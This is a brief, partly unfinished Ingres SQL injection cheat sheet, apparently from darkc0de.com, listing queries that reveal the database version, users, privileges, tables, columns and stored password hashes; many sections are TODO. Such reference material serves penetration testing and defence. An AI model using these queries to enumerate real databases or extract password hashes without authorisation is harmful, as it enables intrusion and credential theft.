Ingres SQL Injection Cheat Sheet
Send all updates to [ d3hydr8[at]gmail[dot]com ] or use the form below.
Last Modified: Tuesday, 22-Sep-2009 10:11:17 EDT




Version
select dbmsinfo('_version');
Comments
SELECT 123; -- comment
select 123; /* comment */
Current User
select dbmsinfo('session_user');
select dbmsinfo('system_user');
List Users
First connect to iidbdb, then:
select name, password from iiuser;
List Password Hashes
First connect to iidbdb, then:
select name, password from iiuser;
List Privileges
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');
List DBA Accounts
TODO
Current Database
select dbmsinfo('database');
List Databases
TODO
List Columns
select column_name, column_datatype, table_name, table_owner from iicolumns;
List Tables
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';
Find Tables From Column Name
TODO
Select Nth Row

Astoundingly, this doesn't seem to be possible!  This is as close as you can get:

select top 10 blah from table;
select first 10 blah from table;

Select Nth Char
select substr('abc', 2, 1); -- returns 'b'
Bitwise AND 

The function "bit_and" exists, but seems hard to use.  Here's an
example of ANDing 3 and 5 together.  The result is a "byte" type
with value \001:

select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> Char

TODO
Char -> ASCII Value
TODO
(The "ascii" function exists, but doesn't seem to do what I'd expect.)
Casting
select cast(123 as varchar);
select cast('123' as integer);
String Concatenation
select 'abc' || 'def';

If Statement

TODO
Case Statement
TODO
Avoiding Quotes
TODO
Time Delay 

???

See Heavy Queries article for some ideas.

Make DNS Requests
TODO
Command Execution
TODO
Local File Access
TODO
Hostname, IP Address
TODO
Location of DB files
TODO






This site is maintained by d3hydr8[at]gmail[dot]com
darkc0de.com ™ © 2006-Now


